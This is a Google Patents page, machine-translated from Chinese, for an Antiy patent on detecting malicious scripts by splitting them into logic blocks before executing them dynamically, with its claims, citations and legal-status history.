CN110119618A - The detection method and device of malicious script - Google Patents

The detection method and device of malicious script Download PDF

Info

Publication number
CN110119618A
CN110119618A CN201811291818.8A CN201811291818A CN110119618A CN 110119618 A CN110119618 A CN 110119618A CN 201811291818 A CN201811291818 A CN 201811291818A CN 110119618 A CN110119618 A CN 110119618A
Authority
CN
China
Prior art keywords
script
malicious
processing
measured
dynamic
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Granted
Application number
CN201811291818.8A
Other languages
Chinese (zh)
Other versions
CN110119618B (en
Inventor
李石磊
王春秋
童志明
何公道
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
Antiy Technology Group Co Ltd
Original Assignee
Harbin Antiy Technology Co Ltd
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by Harbin Antiy Technology Co Ltd filed Critical Harbin Antiy Technology Co Ltd
Priority to CN201811291818.8A priority Critical patent/CN110119618B/en
Publication of CN110119618A publication Critical patent/CN110119618A/en
Application granted granted Critical
Publication of CN110119618B publication Critical patent/CN110119618B/en
Active legal-status Critical Current
Anticipated expiration legal-status Critical

Links

Classifications

    • GPHYSICS
    • G06COMPUTING; CALCULATING OR COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F21/00Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F21/50Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
    • G06F21/55Detecting local intrusion or implementing counter-measures
    • G06F21/56Computer malware detection or handling, e.g. anti-virus arrangements
    • G06F21/562Static detection
    • GPHYSICS
    • G06COMPUTING; CALCULATING OR COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F21/00Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F21/50Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
    • G06F21/55Detecting local intrusion or implementing counter-measures
    • G06F21/56Computer malware detection or handling, e.g. anti-virus arrangements
    • G06F21/566Dynamic detection, i.e. detection performed at run-time, e.g. emulation, suspicious activities

Landscapes

  • Engineering & Computer Science (AREA)
  • Computer Security & Cryptography (AREA)
  • Software Systems (AREA)
  • Computer Hardware Design (AREA)
  • General Engineering & Computer Science (AREA)
  • Theoretical Computer Science (AREA)
  • Virology (AREA)
  • Health & Medical Sciences (AREA)
  • Physics & Mathematics (AREA)
  • General Physics & Mathematics (AREA)
  • General Health & Medical Sciences (AREA)
  • Debugging And Monitoring (AREA)
  • Storage Device Security (AREA)

Abstract

The invention discloses a kind of detection method and device of malicious script, wherein method is the following steps are included: obtain script to be measured, and obtain multiple logic partitionings of script to be measured by morphology syntactic analysis;Dynamic processing is carried out to each logic partitioning of multiple logic partitionings, and obtains the processing result of each logical block;The malice testing result of script to be measured is obtained according to the processing result of each logical block.This method enables to malicious code that can unconditionally execute in dynamic detection, fast and accurately detect the real malicious act of malicious script, realize effective detection of malicious script, to effectively improve the accuracy and reliability of detection, so that user can promote the usage experience of user to avoid the attack by malicious script.

Description

The detection method and device of malicious script
Technical field
The present invention relates to computer network security technology field, in particular to the detection method and dress of a kind of malicious script It sets.
Background technique
The relevant technologies, malicious code dynamic testing method are to be carried out in virtual environment by the malicious act that code executes Judgement, to realize the dynamic detection of malicious code.
However, the malice foot executed for bypassing malicious code by way of being delayed, judging the anti-sandbox such as current time This and using encryption, the means such as compress, obscure and hide the malicious act of script and extend the analytical cycle of analysis personnel Malicious script leads to not effectively detect malicious act due to can not execute actual malicious code, therefore, the relevant technologies In, the malicious script for not executing actual malice code often can not be effectively detected, to can not often detect malicious script The accuracy and reliability of real malicious act, detection is poor, and then often can not effectively avoid attacking by malicious script, Greatly reduce usage experience, it would be highly desirable to solve.
Summary of the invention
The present invention is directed to solve at least some of the technical problems in related technologies.
For this purpose, the first purpose of this invention is to propose a kind of detection method of malicious script,.
Second object of the present invention is to propose a kind of detection device of malicious script.
Third object of the present invention is to propose a kind of computer equipment.
Fourth object of the present invention is to propose a kind of non-transitorycomputer readable storage medium.
5th purpose of the invention is to propose a kind of computer program product.
In order to achieve the above objectives, first aspect present invention embodiment proposes a kind of detection method of malicious script, including Following steps: obtaining script to be measured, and multiple logic partitionings of the script to be measured are obtained by morphology syntactic analysis;To described Each logic partitioning of multiple logic partitionings carries out dynamic processing, and obtains the processing result of each logical block;According to institute The processing result for stating each logical block obtains the malice testing result of the script to be measured.
The detection method of the malicious script of the embodiment of the present invention enables to malicious code can be in dynamic detection without item Part executes, and fast and accurately detects the real malicious act of malicious script, effective detection of malicious script is realized, thus effectively The accuracy and reliability for improving detection, so that user can promote making for user to avoid the attack by malicious script With experience.
In addition, the detection method of malicious script according to the above embodiment of the present invention can also have following additional technology Feature:
Further, in one embodiment of the invention, described that the script to be measured is obtained by morphology syntactic analysis Multiple logic partitionings, further comprise: each in the script to be measured being individually performed most by morphology syntactic analysis Small statement element obtains the multiple logic partitioning as a logic partitioning, with segmentation.
Further, in one embodiment of the invention, further includes: save the processing result of each logical block.
Further, in one embodiment of the invention, each logic partitioning to the multiple logic partitioning Carry out dynamic processing, comprising: call dynamic Processing Interface, the multiple logic partitioning is successively passed to and carries out dynamic processing.
In order to achieve the above objectives, second aspect of the present invention embodiment proposes a kind of detection device of malicious script, comprising: First obtains module, divides for obtaining script to be measured, and by multiple logics that morphology syntactic analysis obtains the script to be measured Block;Processing module carries out dynamic processing for each logic partitioning to the multiple logic partitioning, and obtains and described each patrol Collect the processing result of block;Second obtains module, for obtaining the script to be measured according to the processing result of each logical block Malice testing result.
The detection device of the malicious script of the embodiment of the present invention enables to malicious code can be in dynamic detection without item Part executes, and fast and accurately detects the real malicious act of malicious script, effective detection of malicious script is realized, thus effectively The accuracy and reliability for improving detection, so that user can promote making for user to avoid the attack by malicious script With experience.
In addition, the detection device of malicious script according to the above embodiment of the present invention can also have following additional technology Feature:
Further, in one embodiment of the invention, wherein the first acquisition module is further used for passing through word Method syntactic analysis is using the minimum statement element that each is individually performed in the script to be measured as a logic partitioning, with segmentation Obtain the multiple logic partitioning;The processing module is further used for calling dynamic Processing Interface, by the multiple logic Piecemeal is successively passed to and carries out dynamic processing.
Further, in one embodiment of the invention, further includes: preserving module, for saving each logic The processing result of block.
In order to achieve the above objectives, third aspect present invention embodiment proposes a kind of computer equipment, including memory, place The computer program managing device and storage on a memory and can running on a processor, when the processor executes described program, Realize the malicious code dynamic testing method such as above-described embodiment.
In order to achieve the above objectives, fourth aspect present invention embodiment proposes a kind of non-transitory computer-readable storage medium Matter is stored thereon with computer program, realizes that the malicious code dynamic such as above-described embodiment is examined when which is executed by processor Survey method.
In order to achieve the above objectives, fifth aspect present invention embodiment proposes a kind of computer program product, when the meter When instruction in calculation machine program product is executed by processor, the malicious code dynamic testing method such as above-described embodiment is executed.
The additional aspect of the present invention and advantage will be set forth in part in the description, and will partially become from the following description Obviously, or practice through the invention is recognized.
Detailed description of the invention
Above-mentioned and/or additional aspect and advantage of the invention will become from the following description of the accompanying drawings of embodiments Obviously and it is readily appreciated that, in which:
Fig. 1 is the flow chart according to the detection method of the malicious script of one embodiment of the invention;
Fig. 2 is the flow chart according to the detection method of the malicious script of a specific embodiment of the invention;
Fig. 3 is the structural schematic diagram according to the detection device of the malicious script of one embodiment of the invention.
Specific embodiment
The embodiment of the present invention is described below in detail, examples of the embodiments are shown in the accompanying drawings, wherein from beginning to end Same or similar label indicates same or similar element or element with the same or similar functions.Below with reference to attached The embodiment of figure description is exemplary, it is intended to is used to explain the present invention, and is not considered as limiting the invention.
The detection method and device of the malicious script proposed according to embodiments of the present invention are described with reference to the accompanying drawings, first will Describe the detection method of the malicious script proposed according to embodiments of the present invention with reference to the accompanying drawings.
Fig. 1 is the flow chart of the detection method of the malicious script of one embodiment of the invention.
As shown in Figure 1, detection method includes the following steps for the malicious script:
In step s101, script to be measured is obtained, and obtains multiple logics point of script to be measured by morphology syntactic analysis Block.
It is understood that as shown in Fig. 2, the embodiment of the present invention obtains script to be detected first, and by script to be detected Static logic partitioning pretreatment is carried out by modes such as morphology syntactic analyses.
It should be noted that the embodiment of the present invention carries out static logic partitioning pretreatment to script to be detected, piecemeal Purpose is to exclude logic judgment and the function call influence caused by following dynamic processing result all in script.Namely Say, static logic partitioning pretreatment can effectively solve logic judgment and function call all in script to following dynamic at It is influenced caused by reason result, to improve the acquisition capability and accuracy rate of dynamic behaviour.
Further, in one embodiment of the invention, the multiple of script to be measured are obtained by morphology syntactic analysis to patrol Piecemeal is collected, further comprises: being made by the minimum statement element that each in script to be measured is individually performed for morphology syntactic analysis For a logic partitioning, multiple logic partitionings are obtained with segmentation.
It is understood that the method for piecemeal is that each in script can be individually performed according to morphology syntactic analysis Minimum statement element is as a logic partitioning (such as splitting unconditional execution etc. for the sentence inside if/else).
In step s 102, dynamic processing is carried out to each logic partitioning of multiple logic partitionings, and obtains each logic The processing result of block.
It is understood that multiple logic partitionings are sent to dynamic detection module, dynamic detection mould by the embodiment of the present invention The multiple logic partitionings received are carried out dynamic processing by block.
Further, in one embodiment of the invention, dynamic is carried out to each logic partitioning of multiple logic partitionings Processing, comprising: call dynamic Processing Interface, multiple logic partitionings are successively passed to and carry out dynamic processing.
It is understood that the embodiment of the present invention calls dynamic Processing Interface, the logic partitioning divided successively is passed to Dynamic processing is carried out, so that the processing result of each logic partitioning is obtained, in this way when a piecemeal is in the process of dynamic processing In when the error occurs, will not influence the dynamic processing of subsequent module, as much as possible more codes can be executed, to mention The acquisition capability of high malicious code dynamic behaviour.
Further, in one embodiment of the invention, the method for the embodiment of the present invention further include: save each logic The processing result of block.
It is understood that as shown in Fig. 2, the embodiment of the present invention can treated that processing result is protected by each piecemeal dynamic It deposits.
In step s 103, the malice testing result of script to be measured is obtained according to the processing result of each logical block.
For example, the malicious script overwhelming majority to be detected carries out overcompression encryption and the means such as obscures, if according to tradition Dynamic detection mode detected, encounter by way of being delayed, judging the anti-sandbox such as current time around malicious code When execution, the malicious act of malicious script just can not be really detected.Therefore the embodiment of the present invention is dynamically handling foot to be detected Increase static logic partitioning pretreatment function before this, the sentence for enabling each to be individually performed can when dynamic is handled It is performed, so as to effectively improve the acquisition capability and accuracy rate of malicious code dynamic behaviour.
Specifically, in one particular embodiment of the present invention, as shown in Fig. 2, the method for the embodiment of the present invention includes Following steps:
Step S201 starts.
Step S202, script to be detected.
That is, obtaining script to be measured, S203. is entered step
Step S203, static logic piecemeal.
Specifically, script to be detected is subjected to static logic partitioning pretreatment by modes such as morphology syntactic analyses, thus Exclude logic judgment and function call all in script influences caused by following dynamic processing result.
In an embodiment of the present invention, the embodiment of the present invention increases static logic partitioning pretreatment function, enables each The sentence being enough individually performed can be performed when dynamic is handled, so as to effectively improve obtaining for malicious code dynamic behaviour Take ability and accuracy rate.
Step S204, dynamic are handled.
After static logic partitioning pretreatment, the logic partitioning divided successively is passed to and carries out dynamic processing, thus To the processing result of each logic partitioning, avoid working as a piecemeal during dynamic is handled when the error occurs, Bu Huiying The dynamic processing for ringing subsequent module, performs effectively more codes, to improve the acquisition capability of malicious code dynamic behaviour.
Step S205 saves each piecemeal processing result.
Step S206 obtains malice testing result according to each piecemeal processing result.
In short, encountering if the dynamic detection mode according to the relevant technologies is detected by being delayed, judging current time When mode etc. anti-sandbox bypasses the execution of malicious code, the malicious act of malicious script just can not be really detected, however originally Inventive embodiments increase static logic partitioning pretreatment function before dynamically handling script to be detected, keep each independent The sentence of execution dynamic handle when can be performed, and call dynamic Processing Interface, by the logic partitioning divided according to Secondary incoming progress dynamic processing, to obtain the processing result of each logic partitioning.
Step S207 terminates.
The embodiment of the present invention enables to malicious code that can unconditionally execute in dynamic detection, fast and accurately detects The real malicious act of malicious script out realizes effective detection of malicious script, and then effectively detects that malicious script is real Malicious act avoids attacking by malicious script.
Logic point is added in the detection method of the malicious script proposed according to embodiments of the present invention on static detection method Block preprocessing function simultaneously combines dynamic to handle, and enables to malicious code that can unconditionally execute in dynamic detection, quickly quasi- True detects the real malicious act of malicious script, realizes effective detection of malicious script, so as to effectively improve malice The acquisition capability of code dynamic behaviour effectively improves the accuracy and reliability of detection so that user can to avoid by The attack of malicious script promotes the usage experience of user.
Referring next to the detection device for the malicious script that attached drawing description proposes according to embodiments of the present invention.
Fig. 3 is the structural schematic diagram of the detection device of the malicious script of one embodiment of the invention.
As shown in figure 3, the detection device 10 of the malicious script includes: the first acquisition module 100, processing module 200 and Two obtain module 300.
Wherein, the first acquisition module 100 is for obtaining script to be measured, and obtains script to be measured by morphology syntactic analysis Multiple logic partitionings.Processing module 200 is used to carry out dynamic processing to each logic partitioning of multiple logic partitionings, and obtains every The processing result of a logical block.Second acquisition module 300 is used to obtain script to be measured according to the processing result of each logical block Malice testing result.The device 10 of the embodiment of the present invention enables to malicious code that can unconditionally execute in dynamic detection, It fast and accurately detects effectively to detect the real malicious act of malicious script, realizes effective detection of malicious script, thus The accuracy and reliability of detection is effectively improved, so that user can promote user to avoid the attack by malicious script Usage experience.
Further, in one embodiment of the invention, wherein the first acquisition module 100 is further used for passing through word The minimum statement element that each in script to be measured is individually performed for method syntactic analysis is obtained as a logic partitioning with segmentation Multiple logic partitionings;Processing module is further used for calling dynamic Processing Interface, and multiple logic partitionings are successively passed to and are carried out Dynamic is handled.
Further, in one embodiment of the invention, the device 10 of the embodiment of the present invention further include: preserving module. Wherein, preserving module is used to save the processing result of each logical block.
It should be noted that the explanation of the aforementioned detection method embodiment to malicious script is also applied for the embodiment Malicious script detection device, details are not described herein again.
Logic point is added in the detection device of the malicious script proposed according to embodiments of the present invention on static detection method Block preprocessing function simultaneously combines dynamic to handle, and enables to malicious code that can unconditionally execute in dynamic detection, quickly quasi- True detects the real malicious act of malicious script, realizes effective detection of malicious script, so as to effectively improve malice The acquisition capability of code dynamic behaviour effectively improves the accuracy and reliability of detection so that user can to avoid by The attack of malicious script promotes the usage experience of user.
In addition, the embodiment of the present invention also proposed a kind of computer equipment, including memory, processor and it is stored in storage On device and the computer program that can run on a processor, when processor executes program, the malice generation such as above-described embodiment is realized Code dynamic testing method.
In addition, the embodiment of the present invention also proposed a kind of non-transitorycomputer readable storage medium, it is stored thereon with meter Calculation machine program realizes the malicious code dynamic testing method such as above-described embodiment when the program is executed by processor.
In addition, embodiment of the invention also proposed a kind of computer program product, when the finger in computer program product When order is executed by processor, the malicious code dynamic testing method such as above-described embodiment is executed.
In addition, term " first ", " second " are used for descriptive purposes only and cannot be understood as indicating or suggesting relative importance Or implicitly indicate the quantity of indicated technical characteristic.Define " first " as a result, the feature of " second " can be expressed or Implicitly include at least one this feature.In the description of the present invention, the meaning of " plurality " is at least two, such as two, three It is a etc., unless otherwise specifically defined.
In the description of this specification, reference term " one embodiment ", " some embodiments ", " example ", " specifically show The description of example " or " some examples " etc. means specific features, structure, material or spy described in conjunction with this embodiment or example Point is included at least one embodiment or example of the invention.In the present specification, schematic expression of the above terms are not It must be directed to identical embodiment or example.Moreover, particular features, structures, materials, or characteristics described can be in office It can be combined in any suitable manner in one or more embodiment or examples.In addition, without conflicting with each other, the skill of this field Art personnel can tie the feature of different embodiments or examples described in this specification and different embodiments or examples It closes and combines.
Although the embodiments of the present invention has been shown and described above, it is to be understood that above-described embodiment is example Property, it is not considered as limiting the invention, those skilled in the art within the scope of the invention can be to above-mentioned Embodiment is changed, modifies, replacement and variant.

Claims (10)

1. a kind of detection method of malicious script, which comprises the following steps:
Script to be measured is obtained, and obtains multiple logic partitionings of the script to be measured by morphology syntactic analysis;
Dynamic processing is carried out to each logic partitioning of the multiple logic partitioning, and obtains the processing knot of each logical block Fruit;And
The malice testing result of the script to be measured is obtained according to the processing result of each logical block.
2. malicious code dynamic testing method according to claim 1, which is characterized in that described to pass through morphology syntactic analysis The multiple logic partitionings for obtaining the script to be measured further comprise:
By morphology syntactic analysis using the minimum statement element that each is individually performed in the script to be measured as a logic Piecemeal obtains the multiple logic partitioning with segmentation.
3. malicious code dynamic testing method according to claim 1, which is characterized in that further include:
Save the processing result of each logical block.
4. malicious code dynamic testing method according to claim 1, which is characterized in that described to the multiple logic point Each logic partitioning of block carries out dynamic processing, comprising: calls dynamic Processing Interface, the multiple logic partitioning is successively passed Enter to carry out dynamic processing.
5. a kind of detection device of malicious script characterized by comprising
First obtains module, for obtaining script to be measured, and obtains the multiple of script to be measured by morphology syntactic analysis and patrols Collect piecemeal;
Processing module carries out dynamic processing for each logic partitioning to the multiple logic partitioning, and obtains described each The processing result of logical block;And
Second obtains module, and the malice for obtaining the script to be measured according to the processing result of each logical block detects knot Fruit.
6. malicious code device for dynamically detecting according to claim 5, which is characterized in that wherein,
The first acquisition module is further used for that each in the script to be measured being individually performed by morphology syntactic analysis Minimum statement element as a logic partitioning, the multiple logic partitioning is obtained with segmentation;
The processing module is further used for calling dynamic Processing Interface, and the multiple logic partitioning is successively passed to and is moved State processing.
7. malicious code device for dynamically detecting according to claim 5, which is characterized in that further include:
Preserving module, for saving the processing result of each logical block.
8. a kind of computer equipment, which is characterized in that on a memory and can be in processor including memory, processor and storage The computer program of upper operation when the processor executes described program, realizes the malice as described in any in claim 1-4 Code dynamic testing method.
9. a kind of non-transitorycomputer readable storage medium, is stored thereon with computer program, which is characterized in that the program quilt The malicious code dynamic testing method as described in any in claim 1-4 is realized when processor executes.
10. a kind of computer program product, which is characterized in that when the instruction in the computer program product is executed by processor When, execute the malicious code dynamic testing method as described in any in claim 1-4.
CN201811291818.8A 2018-10-31 2018-10-31 Malicious script detection method and device Active CN110119618B (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN201811291818.8A CN110119618B (en) 2018-10-31 2018-10-31 Malicious script detection method and device

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN201811291818.8A CN110119618B (en) 2018-10-31 2018-10-31 Malicious script detection method and device

Publications (2)

Publication Number Publication Date
CN110119618A true CN110119618A (en) 2019-08-13
CN110119618B CN110119618B (en) 2021-05-04

Family

ID=67519717

Family Applications (1)

Application Number Title Priority Date Filing Date
CN201811291818.8A Active CN110119618B (en) 2018-10-31 2018-10-31 Malicious script detection method and device

Country Status (1)

Country Link
CN (1) CN110119618B (en)

Citations (5)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN101799855A (en) * 2010-03-12 2010-08-11 北京大学 Simulated webpage Trojan detecting method based on ActiveX component
US20110239294A1 (en) * 2010-03-29 2011-09-29 Electronics And Telecommunications Research Institute System and method for detecting malicious script
CN103559441A (en) * 2013-10-28 2014-02-05 中国科学院信息工程研究所 Cross-platform detection method and system for malicious files in cloud environment
CN104333558A (en) * 2014-11-17 2015-02-04 广州华多网络科技有限公司 Website detection method and device
WO2018131199A1 (en) * 2017-01-11 2018-07-19 日本電信電話株式会社 Combining device, combining method and combining program

Patent Citations (5)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN101799855A (en) * 2010-03-12 2010-08-11 北京大学 Simulated webpage Trojan detecting method based on ActiveX component
US20110239294A1 (en) * 2010-03-29 2011-09-29 Electronics And Telecommunications Research Institute System and method for detecting malicious script
CN103559441A (en) * 2013-10-28 2014-02-05 中国科学院信息工程研究所 Cross-platform detection method and system for malicious files in cloud environment
CN104333558A (en) * 2014-11-17 2015-02-04 广州华多网络科技有限公司 Website detection method and device
WO2018131199A1 (en) * 2017-01-11 2018-07-19 日本電信電話株式会社 Combining device, combining method and combining program

Also Published As

Publication number Publication date
CN110119618B (en) 2021-05-04

Similar Documents

Publication Publication Date Title
KR102306568B1 (en) Processor trace-based enforcement of control flow integrity in computer systems
CN106682505B (en) Virus detection method, terminal, server and system
US9189365B2 (en) Hardware-assisted program trace collection with selectable call-signature capture
CN109711172A (en) Data prevention method and device
CN104462962B (en) A kind of method for detecting unknown malicious code and binary vulnerability
US8627478B2 (en) Method and apparatus for inspecting non-portable executable files
CN104967630B (en) The processing method and processing device of web access requests
CN105868630A (en) Malicious PDF document detection method
CN107315961B (en) Program vulnerability detection method and device, computing equipment and storage medium
CN106951780A (en) Beat again the static detection method and device of bag malicious application
CN106599688A (en) Application category-based Android malicious software detection method
CN108399336B (en) Detection method and device for malicious behaviors of android application
CN106096391A (en) Process control method and user terminal
CN103294951A (en) Malicious code sample extraction method and system based on document type bug
CN105740711A (en) Malicious code detection method and system based on kernel object behavior body
Sadeghi et al. Mining the categorized software repositories to improve the analysis of security vulnerabilities
CN105488414A (en) Method and system for preventing malicious codes from detecting virtual environments
CN106228065B (en) Method and device for positioning buffer overflow vulnerability
CN111291377A (en) Application vulnerability detection method and system
CN110119618A (en) The detection method and device of malicious script
US8762953B2 (en) Exception-based error handling in an array-based language
CN106301974A (en) A kind of website back door detection method and device
US20140026216A1 (en) System, method, and computer program product for detecting unwanted data based on scanning associated with a payload execution and a behavioral analysis
US20190213323A1 (en) Systems and methods for detecting and mitigating code injection attacks
US20220138311A1 (en) Systems and methods for detecting and mitigating code injection attacks

Legal Events

Date Code Title Description
PB01 Publication
PB01 Publication
SE01 Entry into force of request for substantive examination
SE01 Entry into force of request for substantive examination
CB02 Change of applicant information
CB02 Change of applicant information

Address after: 150028 Building 7, Innovation Plaza, Science and Technology Innovation City, Harbin Hi-tech Industrial Development Zone, Harbin, Heilongjiang Province (838 Shikun Road)

Applicant after: Harbin antiy Technology Group Limited by Share Ltd

Address before: Room 506, Room 162, Hongqi Street, No. 17 Building, Nangang, High-tech Venture Center, Harbin High-tech Industrial Development Zone, Heilongjiang Province, 150000

Applicant before: Harbin Antiy Technology Co., Ltd.

GR01 Patent grant
GR01 Patent grant
CP01 Change in the name or title of a patent holder
CP01 Change in the name or title of a patent holder

Address after: 150028 building 7, innovation and entrepreneurship square, science and technology innovation city, Harbin high tech Industrial Development Zone, Harbin, Heilongjiang Province (No. 838, Shikun Road)

Patentee after: Antan Technology Group Co.,Ltd.

Address before: 150028 building 7, innovation and entrepreneurship square, science and technology innovation city, Harbin high tech Industrial Development Zone, Harbin, Heilongjiang Province (No. 838, Shikun Road)

Patentee before: Harbin Antian Science and Technology Group Co.,Ltd.